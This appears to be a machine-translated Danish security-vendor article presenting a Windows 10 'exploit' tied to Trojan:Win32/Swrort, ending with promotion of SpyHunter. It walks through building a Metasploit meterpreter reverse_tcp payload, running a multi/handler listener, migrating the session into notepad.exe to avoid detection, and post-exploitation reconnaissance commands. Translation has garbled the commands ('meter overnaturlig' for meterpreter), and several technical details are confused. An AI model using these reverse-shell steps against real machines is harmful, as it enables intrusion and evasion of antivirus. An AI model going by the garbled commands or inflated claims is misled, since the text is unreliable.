| Navn | Trojan:Win32 / Swrort |
| Type | Trojan |
| Kort beskrivelse | Læs og skriv tilladelser i Windows 10. Tillader angriberen at inficere andre pc tilsluttet til den inficerede én. |
| Symptomer | Viser sig af en uvant .exe-fil. |
| Distributionsmetode | Spam mails. MITM angreb, ondsindede omdirigeringer. |
| Værktøj Detection | Hent SpyHunter, at se, om dit system er blevet påvirket af Trojan:Win32 / Swrort |
En farlig exploit er blevet opdaget i Windows 10, ved hjælp af en Trojan:Win32 / Swrort at omgå Windows Defender og få læst og skrive tilladelser. Anonym forsker har vist sårbarheden fra en kanal, kaldet Metasploitstation. Han viser 3 faser, hvor du kan glide forbi Windows 10 forsvar. Der var ingen oplysninger opdaget hidtil på, om dette udnytter er fastsat eller ingen.
Vinduer 10 Multihandler Exploit Infektion – Hvordan gør man det?
I videoen, tech-kyndige bruger demonstrerede en simulation af en '123.exe' fil, som han skaber og udfører, som om den blev åbnet i den virkelige verden som en vedhæftet fil til en e-mail eller henrettes ved en anden metode. Vi har valgt at opdele infektionen proces i tre faser for at hjælpe dig med bedre at forstå den metode.
Fase 1: Fil Forberedelse
Hackeren skaber en nyttelast med denne konfiguration i et Linux-miljø:
→msfpaayload vinduer / meter overnaturlig / reverse_tcp LHOST =
portnumber1 * – Dette er terminalen anvendes for angrebet. Det kan være en havn (4444, 4324, etc.). Vi har skrevet portnumber1 siden han bruger en anden portnummer, som vi navngivet
Efter denne fase er afsluttet, og filen er oprettet af angriberen og faldt på brugerens system,, angriberen kan fortsætte til fase 2.
Fase 2: Brug af udnytte.
På dette tidspunkt, hackeren bruger multihandler at gøre det se .exe og drage fordel af den udnytte til at åbne en aktiv session(forbinde) til offeret PC.
Dette kan ske ved hjælp af de nuværende kommandolinjer:
→msfconsole (For at starte konsollen. Åbner op 'MSF>' interface)
I 'MSF' hackeren kan udføre følgende kommandoer:
→MSF> brug udnytter / multi / handleren
sæt lhost 'offer IP-adresse’
Set lport 'portnumber1’
Efter at, angriberen udfører nyttelasten til at etablere en session:
→msfexploit(handleren)> Indstil nyttelast vinduer / meter overnaturlig / reverse_tcp
For at kontrollere om en aktiv session er mulig, angriberen skriver kommandoen msfexploit(handleren)> Vis indstillinger, der gør ham til at se denne
→EXITFUNC proces ja Exit teknik(accepteret: seh, tråd..)
LHOST offer IP-adresse ja lytte port
LPORT portnumber1 ja lytte adresse
Dette tillader ham at se, at han konfigureret indstillingerne korrekt og kan fortsætte med den faktiske infektion af computeren.
Fase 3: Infektion
Kommandoen at angriberen bruger til at indlede en aktiv session med offeret er 'Udnytte'. Efter at denne kommando, filen "123.exe 'gav med dette svar:
→[*] Startede omvendt handler om
[*] Start af nyttelast handleren…
På dette tidspunkt, den eksekverbare blev startet på Windows-maskine. På trods af, at Windows Defender-softwaren kørte, det gjorde ikke stoppe angrebet. Men når scannet for virus, Windows antivirus program straks opdaget "123.exe 'som en trojansk:Win32 / Swrort.A.
For at undgå at blive opdaget, angriberen brugt en taktik, kaldet migrerende som skabte en "notepad.exe" fil, der migrerer den aktive session fra "123.exe 'til denne fil ved at forbinde. Dette blev gjort ved hjælp af kommandoen:
→meter overnaturlig> køre post / vinduer / styre / migrere
Efter at migrere processen og gentage det samme simulering, men ved hjælp af
Derfra, angriberen viste fuld læse og skrev tilladelser ved at oprette en ny mappe med et nyt tekstdokument. Så vidt vi ved, er de vigtigste kommandoer, der kan anvendes efter forbindelse er:
→> Sysinfo - for at vise systemet versionen og information.
> dir :/
> Skal - for at vise Windows-versionen og anden information.
> Getwid - viser Windows ID.
> Ps -aux - viser alle .exe filer, der kører i Windows Jobliste.
> Ifconfig - viser oplysninger om grænseflader (IP-adresser og andre oplysninger). Denne kommando giver angriberen oplysningerne til at oprette forbindelse til en anden computer, der er i den samme NIC og VLAN med den inficerede pc. Dette kan være meget ødelæggende for hjemmet eller kontor netværk i tilfælde sådant angreb er godt organiseret.
Vinduer 10 exploits – Konklusion
Der er ingen egentlig information om, hvorvidt dette udnytter er blevet fastsat, men ligesom med enhver anden software, der kan være mere udækkede dem. Det er derfor, at hvis du bruger Windows 10, anbefaler vi at hente og installere avanceret malware beskyttelse program. Det vil aktivt beskytte dig og opdatere sig selv jævnligt med de nyeste trusler. Også, sådant program har aktive skjolde, der umiddelbart registrerer uautoriserede tilslutninger.
Spy Hunter scanner kun detektere trussel. Hvis du ønsker, at truslen skal fjernes automatisk, du nødt til at købe den fulde version af anti-malware værktøj.Læs mere om SpyHunter Anti-Malware værktøj / Sådan fjernes SpyHunter
